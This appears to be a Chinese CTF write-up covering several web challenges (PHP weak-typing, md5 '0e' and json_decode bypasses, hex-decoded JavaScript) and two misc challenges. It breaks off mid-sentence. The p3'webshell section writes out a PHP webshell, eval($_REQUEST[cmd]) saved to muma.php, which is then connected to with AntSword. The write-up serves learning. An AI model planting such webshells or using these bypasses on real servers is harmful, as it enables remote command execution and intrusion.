web
weak_type
打开进入环境可以看到一段php代码,进行分析可得需3步得出flag
1.需get传num使得intval($num,0)===202020020可过leve1,===是比较值和类型是否都相等,所以可以让num=+202020020即可
2.分析可得leve2通关条件是get传v1,v2且v1,v2经过md5加密后v1=v2即可。md5哈希之后都是0e开头的,所以传入开头是0e的v1,v2就行
3.分析为json绕过。json_decode — 对 JSON 格式的字符串进行编码,搜索json绕过构造钥匙message={“key”,0}可得出flag(输入一个json类型的字符串,json_decode函数解密成一个数组,判断数组中key的值是否等于$ key的值,但是$key的值我们不知道,但是可以利用0=="admin"这种形式绕过,最终payload message={“key”:0})。最后得到flag
fungame
打开后是一个有趣的游戏,一般通关就能得flag,于是我打到了最后一关,但关卡设计太过人性,最后没得到。又想到flag就在游戏代码里,于是F12查看源码。
最后找到了这串字符:\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C推断可能是flag。看特点可知它是js解密得flag:DMCTF{flag_is_here}
p3’webshell
打开靶机可看到一段代码。分析可得要post传参绕过if上传木马
先看一下题目给的提示,得知原题中的意思是post传参要匹配到preg_match函数中的任意一个即可绕过if
先post上传command=phpinfo();上传成功了(图片上传不成功…)
然后在下面构造木马,试了好多方式…最后上传成功的是
m a = ′ < ? p h p e v a l ( ma = '<?php eval( ma=′<?phpeval(_REQUEST[cmd]);?>’;
file_put_contents(‘muma.php’, $ma);
打开蚁剑链接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-McyflHhw-1607340132390)(file:///C:\Users\XZB\Documents\Tencent Files\1664832569\Image\C2C\0{@LP}9_6S0{06_Y9@UG$ME.png)]
添加完最后在根目录找到flag:flag{a4e6cc3d-bb42-4a52-ab91-e861b4d18cfc}
misc
SimpleQrcode
下载后得到一个变换的二维码,扫码得到几个字母推断完整的flag要把所有的二维码都扫一下。把文件拖进ps一个一个扫可得flag
Cheak In
签到题,flag就在题目上
fakezip
看题目是伪加密,下载完用winhex打开&#